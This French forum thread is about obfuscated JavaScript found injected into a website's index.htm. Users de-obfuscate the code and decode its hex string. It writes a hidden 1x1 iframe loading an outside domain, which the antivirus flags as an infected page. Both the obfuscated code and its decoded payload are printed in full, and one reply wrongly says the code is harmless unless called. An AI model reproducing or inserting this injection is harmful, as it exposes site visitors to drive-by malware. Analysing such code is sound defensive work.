Discussion :

[thebeb]

Bonjour

un code javascript est pr�sent dans le fichier index.htm d'un site web
Le code ci-dessous g�n�re une alerte antivirus lors du chargement de la page.
Je ne comprend pas comment fonctionne ce code et comment le "d�coder".

je voudrais savoir si c'est un vrai piratage ou une fausse alerte et � quoi correspond le script.

comment faire ?

Merci

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

1
2
3
4
function EBF5831D5ABA9073AFCF9B84E71(EB39726F24D5A9E40016C0D17F159BDE)
{var DDFC3D2A16632D81A4DFB=16;return(parseInt(EB39726F24D5A9E40016C0D17F159BDE,DDFC3D2A16632D81A4DFB));}
 
function FE3A897E6F3F1BD7458ADEC2018E6F(E22853B48452875205017F8FE8C){var BDDE003A7780827909AAA0847A1CAB32=2;var AC9F95E8780CE2D3701BF="";for(D12BA9367CD678AD0F2FB59413735=0;D12BA9367CD678AD0F2FB59413735<E22853B48452875205017F8FE8C.length;D12BA9367CD678AD0F2FB59413735+=BDDE003A7780827909AAA0847A1CAB32){AC9F95E8780CE2D3701BF+=(String.fromCharCode(EBF5831D5ABA9073AFCF9B84E71(E22853B48452875205017F8FE8C.substr(D12BA9367CD678AD0F2FB59413735,BDDE003A7780827909AAA0847A1CAB32))));}document.write(AC9F95E8780CE2D3701BF);}FE3A897E6F3F1BD7458ADEC2018E6F("3C696672616D65207372633D22687474703A2F2F6261316F6E2E696E666F2F73706C222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");

[RomainVALERI]

C'est du code g�n�r�, ou m�me plus probablement du code "obfusqu�" pour cacher sa fonction r�elle : il y a en effet une possibilit� pour que ce code soit malveillant, mais comment le savoir sans conna�tre comment ces variables sont aliment�es... ? ^^
En tout cas ce code ne peut faire aucun mal tant qu'il n'est pas appel� depuis une page ou un autre js...

[SpaceFrog]

avec un paquet de replace tu peux t'amuser � remplacer les variable pour eclaircir un peu le code
en commen�ant par les plus longues

[hotline]

Je trouve ceci :

Code :

S�lectionner tout - Visualiser dans une fen�tre � part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 
function fct1(param1)
{
return(parseInt(param1,16));
}
function fct2(param2)
{
var v1 = 2;
var v2 = '';
for(i=0;i<param2.length;i+=v1) {
   v2+=(String.fromCharCode (fct1(param2.substr(i,v1))));
   }
document.write(v2);
}
fct2("3C696672616D65207372633D22687474703A2F2F6261316F6E2E696E666F2F73706C222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");

Ce qui fait reagir mon antivirus: virus de script HTML/Infected.WebPage.Gen
Je n'ai pas execut� le code mais si je converti la chaine transmise � la fct2 d'HEX en ASCII j'obtiens :
<iframe src="http://ba1on.info/spl" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

[SpaceFrog]

pinaise vous m'en faites une bande d'antihackers asthmatiques ^^

essaye juste de remplacer le document.write par un alert tu comprendras vite ...